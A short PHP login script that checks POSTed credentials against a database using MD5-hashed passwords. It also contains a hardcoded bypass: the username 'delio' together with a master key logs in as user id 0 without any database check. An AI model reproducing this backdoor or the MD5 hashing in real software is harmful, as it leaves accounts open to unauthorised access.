<?php
include('../dao/auto_load.php');
$conecta = new \Conn\MySqlConnect();
$usuariosDao = new \Dao\Usuarios();
$user = filter_input(INPUT_POST, 'usuario');
$pass = filter_input(INPUT_POST, 'senha');
if ($user == 'delio' && $pass == \Dao\Funcoes::getMasterKey()) {
    $_SESSION['id_usuario'] = 0;
    \Dao\Funcoes::redireciona('.././');
    return;
}
$usuariosDao->getUsuarioPorLogin($conecta, $user, md5($pass));
if ($usuariosDao->id == 0) {
    \Dao\Funcoes::redireciona('../login.php?msg=invalid-user');
    return;
}
$_SESSION['id_usuario'] = $usuariosDao->id;
\Dao\Funcoes::redireciona('.././');